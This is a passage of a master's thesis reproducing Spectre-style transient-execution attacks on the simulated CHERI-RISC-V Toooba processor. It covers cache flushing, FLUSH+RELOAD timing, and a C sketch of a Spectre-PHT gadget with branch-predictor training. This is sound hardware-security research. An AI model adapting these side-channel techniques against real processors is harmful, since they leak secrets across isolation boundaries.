compiler in charge of what can be microarchitecturally visible to other com-
partments operating on the same system. The following paragraphs discuss
several instructions that could be added and what influence they have.
One option is to flush the caches or part of them. Whenever a context-
switch is conducted, the operating system can flush all caches. This will effec-
tively mitigate all attacks presented in Chapters 4 and 5 as the secret cannot
be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V
offer a flush instruction yet [11, 12, 37]. However, this does not solve the
problem of transient-execution attacks themselves as the transient-execution
sequence still happens – its effects are simply cleaned up. Attackers may therefore be able to find another side channel and use it to recover the secret. Moreover, the performance penalty of regularly clearing the caches is cost prohibitive.
Furthermore, it might be an option to add instructions to enable flushing
of microarchitectural state, e.g., flushing the branch prediction unit. This ef-
fectively mitigates cross protection domain training and entry injection. How-
ever, it does not prevent attacks that work by finding a gadget in the victim domain which then reveals a secret. Another option is to disable
entire microarchitectural units. This implies performance penalties, but effec-
tively mitigates attacks through a specific microarchitectural unit; e.g., Arm offers the option to completely disable memory disambiguation, thereby preventing Spectre-STL attacks [36]. Another class of instructions that is often used in
microarchitectures is barriers [33, 36]. Barriers – also called fences – do not allow instructions executed out-of-order or speculatively to pass them, and therefore enable software to secure critical parts of its code. For example, Arm introduces the Speculative Store Bypass Barrier, which works by not letting speculative loads pass previous stores to the same virtual address [36].
2.4 CHERI
Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research
project of the University of Cambridge and SRI International. The CHERI
project has also been joined by Arm Limited who are developing a CHERI-
extended System-on-Chip called Morello using the ARMv8-A architecture as
the base ISA. The goal of the CHERI project is to enrich ISAs with additional
instructions that enable systems to have fine-grained memory protection and
compartmentalisation. CHERI can be divided into four parts: The abstract
model, the mapping of CHERI to a conventional ISA, the hardware imple-
mentation, and the software implementation. This section describes the key
points of the four parts of the CHERI project for RISC-V. CHERI is explained
more thoroughly in [37], which will be the main source unless stated other-
wise.
2.4.1 CHERI Abstract Model
The CHERI model itself is abstract – architecture neutral – and can in the-
ory be mapped to any concrete architecture. Therefore, CHERI extends an
architecture – referred to as the baseline architecture – rather than introduc-
ing a new architecture. The CHERI model is designed so that it composes
well with mechanisms already in contemporary systems. This includes Mem-
ory Management Units (MMUs), virtual memory in general, processor ring
models, and the exception hierarchy on the baseline ISA. The main concept of
CHERI is capabilities. Capabilities are tokens owned by a program that are
characterised by being unforgeable and delegatable. A capability authorises a
program to access a certain area of memory. CHERI follows two main design
principles. First, the designers want to enforce the principle of least privilege.
This principle, commonly used in the security world, states that a program should only get the access rights it needs for correct operation and no more. The second principle is the principle of intentional use, which expresses that when a choice to select a certain right from a pool of rights exists, this choice must always be made explicitly rather than implicitly. The three main project goals
of CHERI are to provide fine-grained memory protection, software compartmentalisation, and a viable transition path. A viable transition path means that
the transition from the conventional architecture to the CHERI variant of it
should be possible with a manageable effort. While the first two CHERI goals
are security goals, the latter one is a design goal as the designers assume that
CHERI will not be used in practice without being compatible with existing
systems.
CHERI uses this concept of capabilities and defines its own CHERI Capabilities in order to fulfil its project goals. The key feature of CHERI is that
capabilities are not implemented in software, but in hardware. Capabilities
and instructions to modify them become part of the ISA. This includes a reg-
ister file for CHERI capabilities as they need more space than conventional
integer pointers. The CHERI model does not specify how these registers need
to be implemented. The implementation can differ from instantiation to in-
stantiation. The following text gives an incomplete list of registers defined by
CHERI:
General Purpose Capability Registers Their usage is comparable to gen-
eral purpose registers on conventional architectures. Code can freely
use general purpose capability registers for loading, storing, and manip-
ulating capabilities, but these registers can also hold non-capability data.
The architectural instantiation can decide how many general purpose ca-
pability registers are implemented. Also the concrete implementation
determines whether general purpose capability registers are an exten-
sion of the general purpose register file defined by the baseline ISA – a
merged capability register file – or whether the two register files should
be split.
63                                                             0
p'16 | otype'18 | bounds'27                      (upper 64 bits)
a'64                                             (lower 64 bits)
p: permissions   otype: object type   a: pointer address
Figure 2.5: Compressed CHERI Capabilities in Memory. Adapted from Watson et al. [37].
Program Counter Capability (PCC) This register extends the program counter
of conventional architectures so that the register holds capabilities in-
stead of integer pointers. Every instruction fetch is issued through the
PCC.
Default Data Capability (DDC) This register is used if code is not CHERI-
aware. All data loads and stores are issued through the DDC. CHERI-
aware code does not use the DDC, but more fine-grained capabilities
granted to the code running.
Others Depending on the baseline ISA more capability registers are available,
e.g., a register for storing the PCC during exception handling.
CHERI Capabilities aim to provide hardware-aided security for pointers. The following attributes are enforced on CHERI Capabilities and must hold at all times.
Bounds The memory accessible by CHERI Capabilities is limited by bounds.
An access outside of the bounds is strictly forbidden.
Permissions The kinds of operations that are permitted on the accessible mem-
ory are limited by permissions. Like bounds, permissions are part of
CHERI Capabilities.
Monotonicity An operation can never add more privileges to a CHERI Ca-
pability, but only restrict these privileges.
Integrity and Provenance A CHERI Capability is always derived from an-
other valid CHERI Capability and it is ensured at any point of execution
that a corrupted CHERI Capability cannot be used as a reference.
Figure 2.5 shows the format of 128-bit CHERI Capabilities in memory.
This is the format used throughout this entire thesis work. CHERI Capabilities
contain the pointer address itself, the compressed bounds, the object type, and
the permissions. The bounds are compressed using the CHERI Concentrate
encoding [37, 38]. CHERI defines one-bit tags for capabilities that are held both in capability registers and in memory. These tags protect the integrity of capabilities and ensure that capabilities are always derived from a valid capability.
The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities
are more thoroughly discussed where appropriate for certain attacks in the
following chapters.
CHERI Capabilities – from now on referred to as capabilities – spread like a tree during runtime. At CPU start, capability registers hold root capabilities that have all permissions set and can access the entire available memory
space. Code will monotonically refine root capabilities during runtime as de-
sired. Finally, a user-space program will be granted fine-grained capabilities
aligned to its needs. These capabilities are the leaves of the tree unless the
program decides to refine its capabilities again. The process of deriving capa-
bilities defines a chain of provenance.
Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed
capability is non-dereferenceable and immutable, which means that sealed capabilities cannot be manipulated and cannot be used for memory accesses. Unsealing is only possible with a capability that grants sufficient rights to do so.
Sealed capabilities are used for two purposes in CHERI systems even though
more use cases are possible. First, they can be passed to untrusted code, e.g. to
serve as a token of authority. Second, sealed capabilities can be used for pro-
tection domain switching. In an object-oriented environment a sealed code
capability and a sealed data capability constitute the object’s code and its ac-
cessible data. An atomic operation unsealing both capabilities and jumping to
the code capability represents a protection domain switch.
In order to comply with the principle of intentional use, CHERI extends the
baseline ISA with capability instructions. It is always explicit which operands
an instruction has and it cannot be interpreted dynamically, e.g. a load either
loads an integer pointer or a capability. CHERI provides the following classes
of instructions:
Extract Capability Fields The purpose of these instructions is to copy certain fields of capabilities, e.g. the offset field, to a general purpose register for inspection.
Move Capability The purpose of these instructions is to move a capability from
one capability register to another one without modifying the capability
itself.
Manipulate Capability These instructions allow monotonic changes to fields of capabilities, e.g. the offset field.
Load and Store These instructions allow loading or storing data through a capability; the class also contains instructions for loading or storing capabilities through another capability. The capability used for loading
or storing has to allow that access by being suitably configured.
Change Control-Flow CHERI offers jump and branch instructions. Whether branches are taken depends on whether certain capability fields are set.
(Un)seal Capability These instructions allow sealing or unsealing a capability with another authorising capability. This class also contains instructions for protection domain switching.
Check Capability These instructions check whether capability fields match
expected values and throw an exception if this is not the case.
2.4.2 CHERI-RISC-V
CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V.
As explained above, RISC-V is an ISA design space due to its modular design.
CHERI-RISC-V can therefore also be considered an ISA design space. A par-
ticular instantiation of CHERI-RISC-V may choose to implement multiple of the options described in the following paragraphs in a parameterisable way.
Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI de-
signers also express the possibility of a 128-bit CHERI-RISC-V mapping when
RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit
CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V, not including the tag bit.
CHERI-RISC-V describes both split and merged register files. The goal of
the CHERI project is to provide hardware that offers memory protection and
compartmentalisation for all kinds of application areas. In a merged register
file, a general purpose register has the width to hold a capability as well. A
merged register file helps to reduce the number of logic gates on a chip where this is necessary, e.g., for ISAs for embedded processors like RV32E. However,
the principle of intentional use has to be fulfilled: an access to a register must never be ambiguous in how its value is interpreted.
Besides the load and store instructions for bytes, half-words, words, and double-words, CHERI-RISC-V also extends RISC-V with instructions that can
load and store floating point values through capabilities. Furthermore, CHERI-
RISC-V allows atomic operations to work with capabilities. Therefore, all
memory accesses in a CHERI-RISC-V system can be handled through capabilities if this is desired by the program. CHERI-RISC-V also offers compressed CHERI
instructions. When executed in capability pointer mode, each implicit register
operand of the compressed instruction is expected to be the capability variant
of the corresponding register.
Furthermore, CHERI-RISC-V introduces Special Capability Registers
(SCRs) that extend conventional RISC-V registers, but also add new registers.
The purpose of SCRs is to enable exception handling with capabilities. They
extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the
three privilege levels for their respective memory areas. CHERI-RISC-V also
extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V en-
riches RISC-V’s Page Table Entries (PTEs) such that there is one bit specifying whether capabilities may be stored to a page and one bit specifying whether capabilities may be loaded from it.
2.4.3 CHERI-RISC-V Hardware
The CHERI project contains three RISC-V processors that have been extended
with CHERI instructions: Piccolo1 is an in-order processor with a 3-stage pipeline that implements RV32ACIMUxCHERI, where xCHERI means that the processor implements CHERI-RISC-V as well. Flute2 is an in-order processor with a 5-stage pipeline that implements RV64ACDFIMSUxCHERI and supports virtual memory. Toooba3 is a deep, superscalar, out-of-order processor that implements RV64ACDFIMSUxCHERI and also supports virtual memory.
2.4.4 CHERI Software Stack
There is a large software stack of programs that have been created especially
for CHERI systems or adapted for them. In this section, I describe the impor-
tant bits with respect to the work conducted in this thesis.
1 available at https://github.com/CTSRD-CHERI/Piccolo
2 available at https://github.com/CTSRD-CHERI/Flute
3 available at https://github.com/CTSRD-CHERI/Toooba
CHERI-LLVM
The LLVM framework can be split into two parts: the front-ends and the back-ends. The main task of the front-ends is to parse the input files and generate the output that is consumed by the back-ends – the Intermediate Representation (IR).
LLVM supports multiple front-ends, e.g., clang in order to compile C/C++.
Furthermore, each target ISA has its own back-end that generates machine
code specific to that ISA. The CHERI project extended the clang front-end
generically for all supported ISAs such that pointers are represented by capa-
bilities instead of integer values. However, each back-end has to be tailored
for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce
the correct CHERI instructions needed. These changes constitute the CHERI-
LLVM framework4. The CHERI-LLVM compiler framework also includes
other tools not needed for compiling in the first place, but that are helpful for
debugging, e.g., riscv64cheri-objdump.
Operating Systems
The CHERI software stack includes two operating systems that have been adapted to run on a CHERI processor. CheriBSD5 is a fork of FreeBSD and
receives the main research focus in OS research within the CHERI project.
CheriBSD provides CheriABI [39], which is an Application Binary Interface
such that applications that use CHERI can communicate with the kernel. The
kernel itself does not need to use capabilities internally, but can. The pure-
capability CheriBSD kernel is currently a work-in-progress. CheriRTOS6 is
a fork of FreeRTOS and intended as a pure-capability system from the very
beginning [40].
2.4.5 CHERI Security Model
CHERI aims to implement two security principles: fine-grained memory pro-
tection and software compartmentalisation. These two principles need to be
guaranteed in all implementations – including in speculation and out-of-order
execution. Cache timing side channels as described in Section 2.2.3 are not
part of the security model. AMD likewise states that its architectures do not prevent cache timing side-channel attacks and argues that these attacks have to be prevented by software [41]. Arm states that timing side-channel
4 available at https://github.com/CTSRD-CHERI/llvm-project
5 available at https://github.com/CTSRD-CHERI/cheribsd
6 available at https://github.com/CTSRD-CHERI/cherios
attacks are not a novelty; however, timing side-channel attacks in connection with transient execution were previously unknown [32]. CHERI does not guarantee the
absence of timing side channels, but should give guarantees about transient
execution. This means that transiently executed instructions should not lead
to any privilege escalation. An attacker should never have access to more ca-
pabilities than those granted by the architectural register state and the capabil-
ities reachable through those. Furthermore, CHERI-RISC-V systems should
follow the security model required by RISC-V, which includes separating the M, S, and U privilege modes and their access rights. Attacks can be divided into three classes based on the degree of involvement of the victim:
Independent This class of attacks does not require any action or help from
the “victim”.
Exploitative This class of attacks requires the “victim” to unknowingly or
unwillingly cooperate with the attacker.
Collusion This class of attacks requires the “victim” to willingly collaborate
with the attacker.
It is expected that attackers are able to execute arbitrary code on a CHERI
system, e.g., a user limited to a sandbox who has turned into an attacker. An example of this could be JavaScript pulled from the web when rendering a page.
Therefore, an attacker is assumed to be able to attempt independent attacks.
Meltdown-style attacks – as explained in Section 2.2.2 – are typical indepen-
dent attacks. It is further expected that the entire CHERI system should be safe
in the presence of such an attacker even in the case of instructions only being
executed transiently. Furthermore, a CHERI system has to expect that an at-
tacker will attempt exploitative attacks by trying to get the unwitting help of
other code running on the system and having access to powerful capabilities.
Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative
attacks. For CHERI implementations, any willing collaboration from the vic-
tim side is not expected, which excludes the class of collusion attacks from the
security model used in this thesis work.
2.5 Related Work
Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB,
and Meltdown-US on CHERI systems. They clearly state that capability fields must not be subject to speculation, but all CHERI checks have to be completed successfully before accessing memory. Otherwise the protection mechanisms
of CHERI are likely to be bypassed. They are especially concerned about
cross protection domain attacks on CHERI systems. Therefore, they propose
the introduction of a CID that specifies when microarchitectural state may be
shared with other protection domains.
Gonzalez et al. [42] were the first to demonstrate speculative-execution
attacks on a RISC-V processor. They successfully reproduced Spectre-
PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43],
but no other speculative attacks. Furthermore, they did not attempt to conduct
Meltdown-style transient-execution attacks. However, Gonzalez et al. stated
the theoretical feasibility of the remaining transient-execution attacks, which
my work proves. Similar work on the BOOM processor has been done
by Le et al. [44].
There has been more work conducted on other comparable RISC archi-
tectures. Arm has summarised and explained the most impactful transient-
execution attacks and explained how they would be conducted on an Arm
microarchitecture [32]. Furthermore, Arm has evaluated which of its mi-
croarchitectures are vulnerable to which attack [45]. The covered attacks are
Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and
Meltdown-GP – the attack names used by Arm do not follow the naming
scheme of this work though. Arm clearly states that all unlisted microarchitectures
are not vulnerable to any transient-execution attack. None of
the listed microarchitectures is vulnerable to all attacks, but only to a subset.
However, Spectre-PHT was classified as successful on all listed microarchitectures.
Moreover, each attack could be reproduced on at least one of Arm's
microarchitectures. As stated by Canella et al. [19], Arm’s processors are
only vulnerable to a subset of Meltdown-style attacks that Intel’s and AMD’s
processors are vulnerable to. Many Meltdown-style attacks are tailored to the
x86_64 architecture and special features of various implementations of it. Neither
Arm's ISA nor RISC-V has the necessary features, and therefore no implementation
is vulnerable to this subset of Meltdown-style attacks. Due to
the similarity in the architectural style, Arm’s summary of attacks also sets the
scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown-
GP will be the main target of this work.
Chapter 3
Methods
In this chapter, I describe the resources I used to conduct my experiments.
Furthermore, I explain which research methods I applied for which part of
this work. The last part of this chapter describes the common methods I used
and how the actual measurements were conducted.
3.1 Toooba
The experiments presented in Chapters 4 and 5 are conducted on CHERI’s
fork of the out-of-order processor Toooba. Toooba itself was developed
by Bluespec Inc., which added compressed instruction support and debugging
to MIT's RISCY-OOO [46] – a framework that allows parameterisable configurations
of the processor to be built. RISCY-OOO is written in the Bluespec
SystemVerilog Hardware Description Language (HDL), which makes such
configuration easier. Bluespec HDL code can be simulated
directly or can be compiled to Verilog code, which then can be simulated by
a Verilog simulator, or it can be used to produce an FPGA image. For all my
experiments, I compiled Toooba's code to Verilog using the open-source
Bluespec compiler¹ (release 2020.02) and used the Verilator simulator²
(version 3.916) in order to produce the results presented in Chapters 4 and 5.
Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in
Toooba. The pipeline can be divided into three separate parts: Fetch, Execute,
and Commit. In this figure, the Fetch stage includes decoding and renaming as
well, which is not the case in conventional models of the pipeline, e.g. by Pat-
terson and Hennessy [14]. This part is also called the front-end of Toooba and
¹ Available at https://github.com/B-Lang-org/bsc
² Available at https://github.com/verilator/verilator
[Figure 3.1 is a block diagram: the Fetch part (Fetch 1–3, Decode, Rename, backed by the instruction cache and BTB), the Execute part (ALU pipelines (n), an FPU pipeline (n/2), and a memory pipeline, each fed by issue queues (IQ), together with the register file/forwarding, TLB, and data cache), and the Commit part with the reorder buffer.]
Figure 3.1: The parameterisable RISCY-OOO pipeline. In my configuration, I chose n = 2, which means that Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline.³
instructions are handled in-order in this part. The rename stage puts instruc-
tions in the reservation stations of the respective pipelines of which Toooba
has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit
(FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n
instructions per cycle, the FPU pipeline n/2 instructions per cycle, and the
memory pipeline one instruction per cycle. The Execute part of Toooba in-
cluding all three pipelines is completely out-of-order and can execute instruc-
tions as soon as all operands are available to it. In my configuration of Toooba,
I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and
retire 2 instructions in one cycle if no bubbles appear in the pipeline, e.g.,
misprediction may cause Toooba not to be able to commit any instruction for
multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one
memory pipeline in my configuration. Processors that can execute more than
one instruction per clock cycle are called superscalar processors. In my in-
stantiation, Toooba is a 2-superscalar processor because it can execute two
instructions per cycle.
Furthermore, I used the TEST cache configuration, which determines the
following settings: The L1 data and instruction cache are each 2 KiB large and
³ This figure is borrowed from the CHERI team.
Out-of-order window size   64
L1 size                    2 KiB
L2 size                    8 KiB
L1/L2 ways                 2
Cache line size            64 bytes
Load Queue size            24
Store Queue size           14
Store Buffer size          4

Table 3.1: The parameters of the Toooba configuration used for my experiments.
2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative
as well, and cache lines are 64 bytes long. Toooba has a window of 64 instruc-
tions that can be executed out-of-order and the memory queues (load queue,
store queue, store buffer) are capable of tracking 38 outstanding memory in-
structions. Toooba supports Sv39, which means that virtual addresses are 39
bits long. These data are summarised in Table 3.1.
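As a quick sanity check, the geometry above can be derived arithmetically. The following C sketch (the helper names are mine, not part of the experiment code) computes the line and set counts implied by Table 3.1:

```c
/* Cache geometry from Table 3.1 (TEST configuration). */
enum {
    L1_SIZE   = 2 * 1024,  /* 2 KiB L1 data/instruction cache */
    L2_SIZE   = 8 * 1024,  /* 8 KiB L2 cache                  */
    WAYS      = 2,         /* both levels are 2-way           */
    LINE_SIZE = 64         /* 64-byte cache lines             */
};

/* Number of cache lines a cache of the given size holds. */
int cache_lines(int size) { return size / LINE_SIZE; }

/* Number of sets: lines divided by associativity. */
int cache_sets(int size)  { return size / (LINE_SIZE * WAYS); }
```

With these values, the L1 holds 32 lines in 16 sets and the L2 holds 128 lines in 64 sets; the 32 L1 lines are exactly the range probed in Section 3.3.2.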
In order to successfully conduct Spectre-BTB attacks as presented in Chapters
4 and 5, I needed to make changes to Toooba's BTB. Before my changes,
Toooba did not use a hashing function for tags, but used the entire address.
I implemented a hashing function, which is described in Section 5.1.3 as it
poses a contribution to the research platform. Having a hashing function for
tags in the BTB is a common mechanism used in industry [22]. Therefore, I
find that my changes to Toooba's BTB are not a simplification of my work, but
rather an adaptation to the real-world setup.
3.2 Research Methodology
In this master’s thesis work, I used quantitative research methods in order to
prove the hypothesis of transient-execution attacks being feasible on Toooba.
Transient-execution attacks will be reproduced in assembly and C code. In
order to produce meaningful results, I rely on the compilation toolchain –
compiler, linker, and assembler – being correct. The success of an attack will
be determined by whether the access time to certain memory data is significantly
faster than to others. For all attempted attacks, I used the Verilator
simulator, which generates a cycle-accurate model from Toooba's Verilog code.
In order for my results to be meaningful, I rely on the Verilator simulation to
be correct. Furthermore, the explanation of why an attack does or does not
work on Toooba is conducted with quantitative methods, as simulation gives
clear and objective evidence of which actions Toooba takes in a given scenario.
In the discussion of the different transient-execution attacks, I mainly use
quantitative research methods as well. Some Spectre-style attacks are run with
a mitigation mechanism enabled, giving quantitative results on whether a specific
attack is successful or not. However, I will also use qualitative methods in
order to describe the impact certain attack classes have. The impact of an
attack is determined by the threat model. Threat models, and evaluating the
threats corresponding to them, require judgement and cannot be expressed in
objective and quantitative data.
3.3 Common Mechanisms
This section summarises common techniques used for the experiments conducted
in Chapters 4 and 5 or in order to prepare them.
3.3.1 Flushing Caches
Flushing caches is used by transient-execution attacks for two reasons. First,
flushing caches – or evicting a specific cache line – leads to longer miss penalties
for loads and thus more accurate timing analysis. Second, flushing caches
provides a clean state before conducting timing measurements. As explained in
Chapters 4 and 5, attackers want the processor to misspeculate and the time
span until the misprediction is discovered and instructions are rolled back to
be as long as possible. This can be achieved by making load requests go all
the way to memory without hitting any of the caches. As described in Section
3.3.2, probing the caches needs a clean state in order to achieve reliable
results.
As stated in Table 3.1, Toooba’s L1 data cache in the TEST configuration
has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not
have a dedicated flush instruction and CHERI-RISC-V does not provide one
either [11, 12, 37]. This means that attackers need to implement their own
flush functions. I implemented a function that loads an entire memory region
into the caches and therefore evicts previously present content. This function
loads at a granularity of 64 bytes, as each load brings in the entire respective
cache line.
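A minimal C sketch of such an eviction-based flush, assuming a normal cacheable buffer at least as large as the 8 KiB L2 cache; the function and buffer names are illustrative and not the exact code used in my experiments:

```c
#include <stddef.h>
#include <stdint.h>

#define LINE_SIZE  64           /* cache line size in bytes (Table 3.1) */
#define FLUSH_SIZE (8 * 1024)   /* cover the 8 KiB L2 cache             */

static uint8_t flush_buf[FLUSH_SIZE];

/* Touch one byte per cache line of a large buffer; each load brings in a
 * whole 64-byte line and evicts whatever previously occupied that set.
 * The checksum is returned so the loop cannot be optimised away. */
uint64_t flush_caches(void)
{
    uint64_t sum = 0;
    for (size_t i = 0; i < FLUSH_SIZE; i += LINE_SIZE)
        sum += ((volatile uint8_t *)flush_buf)[i];
    return sum;
}
```

Since both cache levels are only 2-way associative, one pass over an L2-sized buffer normally suffices to displace the probe array.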
3.3.2 Timing Measurements
For the attacks presented in Chapters 4 and 5, I always use the same mech-
anism in order to prove that an attack has been conducted successfully. The
code under attack will speculatively load a value into the core. This value is
used as an index into a shared array between victim and attacker. Probing the
access times to values in this shared array will allow the attacker to recover the
original secret. Throughout all my experiments, I use FLUSH+RELOAD [18],
which is an access-driven technique. In order to successfully probe the cache,
the attacker evicts all cache lines of the array to be probed – the flush phase –
and then starts the attack. As a result, the only cache line of the shared array
present afterwards is the one that was speculatively accessed to reveal the
secret.
As a next step, the attacker accesses value after value in the shared array
and measures the time it takes to access the array as precisely as possible –
the reload phase. The attacker probes at the granularity of cache lines,
which in Toooba means a granularity of 64 bytes. The results of probing
the memory addresses [0x80001000,0x800017ff] are depicted in Figure 3.2.
As follows from Table 3.1, Toooba's L1 data cache has 32 lines, indexed
[0, ..., 31]. This number of cache lines exactly matches the 0x800-byte range
that the attacker wants to probe in steps of 64 bytes.
In the example in Figure 3.2, the victim code has speculatively accessed a
double-word at the address 0x80001100. The data reflects this exactly: the
cache line with index four has a significantly shorter access time than all other
cache lines. All other memory accesses except the very first one require roughly
30 cycles with only small variations. However, the first memory access is
significantly slower, needing 60 cycles. This can be explained by the cold
branch predictor in the assembly code of the probe function: the cold branch
predictor makes Toooba load instructions from a cache line that is not present,
which causes this delay.
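The reload-phase decision reduces to finding the one clearly fast line among the measured latencies. A small C sketch (the names and the threshold value are my own, chosen to sit below the roughly 30-cycle misses seen in Figure 3.2):

```c
#define NUM_LINES 32   /* probed L1 lines, indices 0..31 */

/* Return the index of the cache line with the lowest access latency below
 * hit_threshold -- the line the victim touched during transient execution --
 * or -1 if every access looks like a miss. */
int recover_secret_line(const int cycles[NUM_LINES], int hit_threshold)
{
    int best = -1;
    int best_cycles = hit_threshold;
    for (int i = 0; i < NUM_LINES; i++) {
        if (cycles[i] < best_cycles) {
            best_cycles = cycles[i];
            best = i;
        }
    }
    return best;
}
```

For measurements like those in Figure 3.2, a threshold of around 20 cycles cleanly separates the single cache hit from the misses and the cold-predictor outlier.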
The attacker can only measure the presence of a certain cache line, but
not which exact address made the cache line being loaded. This means that
the attacker can only leak a very limited number of bits per probing attack.
In my work, I do not use cache bank collision attacks as described in [47].
Therefore, the only information the attacker can gain is which cache line has
been accessed compared to all possible cache lines.
log2(#cache lines) = log2(32) = 5 bits (3.1)
Equation 3.1 shows the amount of information an attacker gains in general
[Bar chart: cycles needed (y-axis, 0–60) versus cache line number (x-axis, 0–28).]
Figure 3.2: Results of probing the L1 cache after an attack has been conducted.
and the exact number in my configuration of Toooba. In order to recover more
than five bits, an attacker will need to conduct the attack multiple times; e.g.,
to recover a full 64-bit double-word, an attacker has to run the attack 13 times.
The speed of leaking values determines the success of real-world attacks
[22, 27]. However, this is out of scope for this thesis work. In Chapters 4
and 5, I present attacks attempted and whether they have been conducted suc-
cessfully, which implies that they are capable of leaking information, but no
claims about the speed and implications of their impact on real-world attacks
are made.
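The arithmetic behind Equation 3.1 and the 13-round figure can be checked directly; the helper functions below are illustrative only:

```c
/* Integer log2 for powers of two: the number of bits leaked per probe. */
int log2_int(int n)
{
    int bits = 0;
    while (n > 1) { n >>= 1; bits++; }
    return bits;
}

/* Probing rounds needed to recover secret_bits when each round reveals
 * log2(lines) bits: ceiling division. */
int rounds_needed(int secret_bits, int lines)
{
    int per_round = log2_int(lines);
    return (secret_bits + per_round - 1) / per_round;
}
```

With 32 cache lines, each round leaks 5 bits and a 64-bit double-word needs ceil(64/5) = 13 rounds, matching the figure above.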
Chapter 4
RISC-V Results
In this chapter, I describe the results obtained by reproducing the different
transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my
knowledge, this work is the first to reproduce all four Spectre-style attacks
on a RISC-V processor. All attacks together build an extensible framework
for exploring transient-execution attacks on RISC-V processors, which con-
stitutes a platform for further research not only on Toooba, but on any other
vulnerable processor. An extension to the framework is contributed by the
work described in Chapter 5, which extends all Spectre-style RISC-V attacks
to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing
the reasons for the success or failure of Spectre-style attacks in both this chap-
ter and the chapter about the CHERI-RISC-V results would introduce many
redundancies. Therefore, I decided to only give a high-level explanation for
most attacks in this chapter and deeply dive into Toooba’s pipeline in the fol-
lowing chapter.
4.1 Spectre Attacks
This section contains the Spectre-style attacks attempted on RISC-V Toooba
in assembly and C. The results are depicted in Table 4.1. An entry marked
with (✓) means that this attack was conducted successfully, (✗) means that I
could not craft a successful attack. An entry marked with (-) indicates that I
did not attempt an attack at all. All attacks could be reproduced successfully
in RISC-V assembly. In order to prove the general applicability, the Spectre-
PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been
reproduced in C as well.
                    asm   C
Spectre-PHT          ✓    ✓
Spectre-PHT-Write    ✓    -
Spectre-BTB          ✓    ✓
Spectre-RSB          ✓    ✓
Spectre-STL-Load     ✓    ✓
Spectre-STL-Jump     ✓    -

Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba and whether they were successful.
4.1.1 Spectre-PHT
The reproduction of Spectre-PHT in both RISC-V assembly and C was con-
ducted as described in [22]. The important piece of Spectre-PHT attacks is to
train the branch direction predictor. The RISCY-OOO processor implements
multiple branch direction predictors. Toooba uses a tournament predictor,
which consists of one local and one global predictor. Both the local and the
global predictor have their own Branch History Table (BHT). A two-bit selector
determines which of these two predictors is used for the actual response
of the tournament predictor. The goal of the attack is to train the prediction
for the branch-greater-equal (bge) instruction such that it predicts
not taken when the actual attack will be conducted. To achieve that, attack-
ers have two options. They can either train the global predictor to return not
taken for that particular branch or they can train the local predictor to return
not taken. The attacker has to keep in mind that it is important to train the
selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train
the tournament predictor in order to achieve a successful attack. The principle
of training remains the same over all Spectre-PHT attacks I conducted.
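The overall training-then-attack structure is the same in C; the sketch below is a simplified stand-in for the bounds-checked gadget of [22] (the array names and sizes are mine), with eight in-bounds calls biasing the direction predictor before the out-of-bounds trigger call:

```c
#include <stddef.h>
#include <stdint.h>

#define ARRAY_LEN 0x20                  /* the global comparison value      */

uint8_t secret_array[ARRAY_LEN];
uint8_t shared_array[32 * 64];          /* one 64-byte line per 5-bit value */

/* Bounds-checked victim gadget: the check compiles to a bge-style branch.
 * In speculation it may be predicted not taken even for idx >= ARRAY_LEN,
 * so both dependent loads execute transiently and leave a cache footprint.
 * Returns 1 if the access was architecturally performed. */
int victim(size_t idx)
{
    if (idx < ARRAY_LEN) {
        uint8_t value = secret_array[idx];
        volatile uint8_t sink = shared_array[(value & 0x1f) * 64];
        (void)sink;                     /* encode value into the cache      */
        return 1;
    }
    return 0;
}

/* Eight in-bounds training calls bias the direction predictor towards
 * "not taken" before the single out-of-bounds trigger call. */
void run_attack(size_t oob_idx)
{
    for (int i = 0; i < 8; i++)
        victim((size_t)(i & (ARRAY_LEN - 1)));
    victim(oob_idx);                    /* architecturally a no-op          */
}
```

The cache side channel itself (flush and reload phases) is elided here; only the control-flow structure of training and trigger is shown.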
In later stages of this work, I reviewed Toooba’s branch direction predic-
tion and made the following observation. When a specific branch is predicted
the first time by the tournament predictor, the predictor always uses the local
branch prediction unit. Furthermore, the local branch predictor is initialised
with predicting False (not taken) for the first prediction. Therefore, whenever
Toooba encounters a branch for the first time, it will be predicted as not taken.
For the Spectre-PHT attack as shown in Figure 5.1, this means that the branch
prediction performs the attacker-desired action by default. Therefore, an
attacker does not need a training phase to conduct a successful attack, which
I have confirmed in a practical example of Spectre-PHT. This helps the attacker
in two ways. First, the attack becomes easier as no previous training calls are
needed; second, the attacker saves time, which positively affects the bandwidth
of a real-world
attack.
4.1.2 Spectre-PHT-Write
This variant of Spectre-PHT seeks to conduct a speculative write instead of a
speculative load [34]. Out-of-bounds writes can be used to direct control-flow
to a gadget of interest for the attacker, e.g., by overwriting the return address re-
siding on the software stack. Speculatively overwriting a return address can be
the starting point of a Return-Oriented Programming (ROP) attack [48]. With
code not using capabilities, I successfully crafted an attack that overwrites the
return address such that the control-flow will be speculatively directed to a
gadget revealing a register value.
4.1.3 Spectre-BTB
